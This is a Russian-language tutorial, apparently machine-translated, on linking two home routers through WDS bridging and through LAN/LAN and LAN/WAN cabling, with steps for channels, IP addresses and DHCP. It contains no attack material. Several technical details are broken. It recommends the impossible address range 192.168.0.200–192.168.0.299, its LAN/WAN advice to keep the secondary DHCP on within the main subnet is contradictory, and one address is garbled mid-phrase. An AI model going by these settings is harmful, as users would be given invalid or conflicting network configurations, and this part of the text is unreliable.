Перед тем как перейти к настройке второго маршрутизатора, необходимо изменить настройки беспроводной сети основного маршрутизатора, чтобы канал для этой сети был статическим, а не автоматическим.
Например, если ваш основной маршрутизатор - другой TP-Link, вы можете изменить канал в настройках, посетив вкладку Wireless . В поле Channel укажите статический канал. Например: 1 или 9, что угодно. Сохраните настройки.
Теперь, когда статический канал установлен, вы можете выйти из основных настроек маршрутизатора.
Настроим маршрутизатор, который будет работать в режиме WDS. В моем случае в качестве конкретной модели используется TР-Link Archer C20.Заходим в настройки роутера.
Для начала нужно сменить IP-адрес второго роутера. Вы должны избегать ситуации, когда два устройства с одинаковыми IP-адресами находятся в одной сети. Например, если главный маршрутизатор имеет IP-адрес 192.168.0.1, а другой маршрутизатор также имеет адрес 192.168.0.1, два адреса будут конфликтовать. Переходим на вкладку Сеть / LAN. В поле IP-адрес измените последнюю цифру - скажем, поставьте 2 вместо 1. Или, как в моем случае, измените его с 192.От 168.1.1 до 192.168.0.2. Сохраните измененные настройки.
Почему вы должны это делать именно так? Вам необходимо знать IP-адрес основного маршрутизатора, к которому вы собираетесь подключиться. Если он имеет адрес 192.168.1.1, тогда адрес маршрутизатора, к которому вы хотите подключиться через WDS, следует изменить на 192.168.1.2. Если основной маршрутизатор имеет адрес 192.168.0.1, вы должны назначить другому маршрутизатору следующий адрес: 192.168.0.2. Важно, чтобы оба маршрутизатора находились в одной подсети.
Снова зайдите в настройки, но на этот раз IP адрес будет другим - 192.168.0.2. Тот, который вы указали ранее.
Перейдите на вкладку Wireless / Basic Settings. В поле Wireless Network Name вы можете указать имя второй беспроводной сети. В поле Channel, убедитесь, что вы указываете тот же канал, который вы указали в настройках основного маршрутизатора. В моем случае это канал 9.
Теперь установите флажок Enable WDS, и нажмите Scan.
Из списка выберите сеть, из которой ваш маршрутизатор будет подключаться к Интернету.Щелкните ссылку Connect рядом с выбранной вами сетью.
Теперь осталось только указать пароль для основной сети в поле Пароль . Введите его и нажмите кнопку Сохранить .
После перезагрузки снова зайдите в настройки второго роутера. Находясь на главной странице (вкладка Status ), посмотрите раздел Wireless . В строке WDS Status должно быть указано Enabled . Это означает, что второй роутер уже подключился к основному роутеру, и теперь он должен транслировать Wi-Fi.
Однако подключение к Интернету будет доступно только по Wi-Fi, и если вы подключите устройства к маршрутизатору (работающему в режиме WDS) с помощью кабеля, они не смогут выйти в Интернет.
Чтобы правильно настроить эту функцию, вы должны отключить DHCP-сервер для маршрутизатора, на котором настроен мост WDS, то есть для маршрутизатора, который в моем случае является второстепенным. Также необходимо, чтобы его локальный IP-адрес находился в той же подсети, к которой принадлежит основной (основной) маршрутизатор.
Поэтому вам необходимо войти в меню DHCP вторичного маршрутизатора и отключить эту функцию.
Это последний шаг в подключении двух маршрутизаторов через Wi-Fi.
Найдите правильное место для размещения второго маршрутизатора, чтобы он попадал в зону действия основного маршрутизатора. Установите желаемое имя для беспроводной сети и пароль. Этот шаг мы уже подробно описывали в нашей статье о настройке режима Wi-Fi для роутера.
Как построить сеть из нескольких маршрутизаторов с помощью кабеля?
Есть два способа соединения нескольких маршрутизаторов в одну сеть с помощью кабеля.Это:
-
Так называемое соединение LAN / LAN. То есть построение сети, состоящей из нескольких маршрутизаторов, путем соединения их портов LAN с помощью сетевого кабеля.
-
И подключение LAN / WAN. То есть построение сети, состоящей из нескольких маршрутизаторов, путем соединения порта LAN основного маршрутизатора с портом WAN / Internet дополнительного маршрутизатора с помощью сетевого кабеля.
Рассмотрим каждую подробнее.
Подключение LAN / LAN
В случае подключения LAN / LAN возьмите два маршрутизатора и решите, какой из них вы хотите использовать в качестве основного устройства.Обычно это маршрутизатор, который получает кабель для подключения к Интернету от вашего интернет-провайдера.
С помощью сетевого кабеля соедините порты LAN основного маршрутизатора с дополнительным (вторичным) маршрутизатором.
Предположим, что мы уже настроили подключение к Интернету для первого маршрутизатора, поэтому я пропущу этот шаг. Если у основного маршрутизатора еще нет подключения к Интернету, устраните эту проблему - просто прочитайте нашу статью об основных настройках маршрутизатора Wi-Fi.
Подключитесь к первому устройству
-
и проверьте, включен ли на нем DHCP-сервер. По умолчанию он обычно включен. Для этого зайдите в меню DHCP / DHCP Settings.
-
Если DHCP-сервер отключен, включите его.
-
Не забудьте сохранить изменения.
Затем подключитесь к другому устройству,
-
и отключите DHCP-сервер, потому что он получит все адреса от основного маршрутизатора. Для этого перейдите в меню DHCP / DHCP Settings.
-
Если DHCP-сервер включен, отключите его.
-
В разделе Сеть / LAN измените IP-адрес, чтобы он не совпадал с адресом основного маршрутизатора. Например, измените его на 192.168.0.2. Поскольку основной маршрутизатор имеет 192.168.0.1
-
Сохранить.
После перезагрузки вторичный маршрутизатор должен работать в одной сети с первым (первичным / основным), получать от него Интернет-соединение и работать как точка доступа.
Подключение LAN / WAN.
Второй способ объединения двух маршрутизаторов в одну сеть - с помощью сетевого кабеля.
В случае подключения LAN / WAN используйте сетевой кабель для соединения порта LAN основного маршрутизатора с портом WAN / Internet другого (вторичного) маршрутизатора.
Подключитесь к первому устройству:
-
и проверьте, включен ли на нем DHCP-сервер. По умолчанию он обычно включен. Для этого перейдите в меню DHCP / DHCP Settings.
-
Если DHCP-сервер отключен, включите его.
-
Не забудьте сохранить изменения.
Затем подключитесь к другому устройству,
-
Для другого устройства перейдите в раздел Сеть / WAN и установите Тип подключения как Динамический IP. Сохраните изменения.
-
В разделе DHCP оставьте DHCP-сервер включенным.
-
Если вы планируете использовать порты LAN дополнительного маршрутизатора, убедитесь, что их IP-адреса не конфликтуют с соответствующими адресами основного маршрутизатора.
То есть, если ваш основной маршрутизатор работает в диапазоне от 192.168.0.100 до 192.168.0.199, лучше иметь диапазон вторичного маршрутизатора от 192.168.0.200 до 192.168.0.299, но всегда в пределах основной подсети.
-
Сохранить.
После этого можно запустить отдельную точку доступа для каждого из маршрутизаторов. Если вы все сделали правильно, оба маршрутизатора будут подключены к Интернету, будут работать в одной сети и иметь доступ к сетевым устройствам.
Это были все способы подключения нескольких маршрутизаторов к одной сети, проводной или беспроводной.
Если у вас есть какие-либо вопросы при объединении нескольких маршрутизаторов в одну сеть, вы можете задать их, разместив комментарий.
.